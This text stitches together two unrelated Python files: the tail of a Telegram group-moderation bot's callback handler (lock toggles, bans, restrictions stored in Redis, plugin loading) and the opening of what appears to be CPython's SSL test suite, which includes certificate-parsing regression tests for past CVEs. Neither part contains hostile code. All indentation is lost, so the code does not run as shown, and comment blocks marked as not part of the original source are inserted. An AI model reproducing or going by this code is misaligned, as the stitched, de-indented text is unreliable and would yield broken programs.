reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator" and H != "asudos":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos" or H == "asudo":
redis.delete("{}Nbot:{}".format(BOT_ID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
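# ---------------------------------------------------------------------------
# Illustrative sketch (added for clarity, not part of the original source):
# the loop above imports every enabled module under files/ as "files.<name>"
# and runs its updateCb() in a daemon thread once per callback update.
# A plugin honouring that contract could, under these assumptions, look
# roughly like the hypothetical files/example.py below.
#
#   # files/example.py
#   def updateCb(client, callback_query, redis):
#       # Invoked for every callback update; it shares the bot process, so keep it fast.
#       if callback_query.data == "example":
#           pass  # react to the button press here
# ---------------------------------------------------------------------------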
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any reference to "ubuntu" implies an Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
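# Illustrative usage (not in the upstream file): seclevel_workaround() is meant
# to be applied to freshly created contexts before a TLS 1.0/1.1 handshake is
# attempted, e.g. roughly:
#
#   client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
#   server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
#   seclevel_workaround(client_context, server_context)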
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
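# Illustrative usage (not in the upstream file): both helpers above are
# typically consulted before exercising a specific protocol or version:
#
#   if has_tls_version(ssl.TLSVersion.TLSv1_3):
#       ...  # safe to require TLS 1.3 in a context
#   if has_tls_protocol("PROTOCOL_TLSv1_2"):
#       ...  # ssl.PROTOCOL_TLSv1_2 exists and is enabled at runtime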
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
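# Illustrative usage (not in the upstream file): the decorator wraps individual
# test methods so they are skipped on builds where the version is unavailable.
# The class and method names below are hypothetical.
#
#   class TLS13Tests(unittest.TestCase):
#       @requires_tls_version('TLSv1_3')
#       def test_needs_tls13(self):
#           ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
#           ctx.minimum_version = ssl.TLSVersion.TLSv1_3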
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
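# Illustrative usage (not in the upstream file): testing_context() returns a
# client context, a server context and the hostname baked into the server
# certificate. A client-side connection would then look roughly like this
# (some_port is hypothetical; the server side must use server_context):
#
#   client_context, server_context, hostname = testing_context()
#   with socket.create_connection((HOST, some_port)) as raw:
#       with client_context.wrap_socket(raw, server_hostname=hostname) as tls:
#           tls.sendall(b"ping")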
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
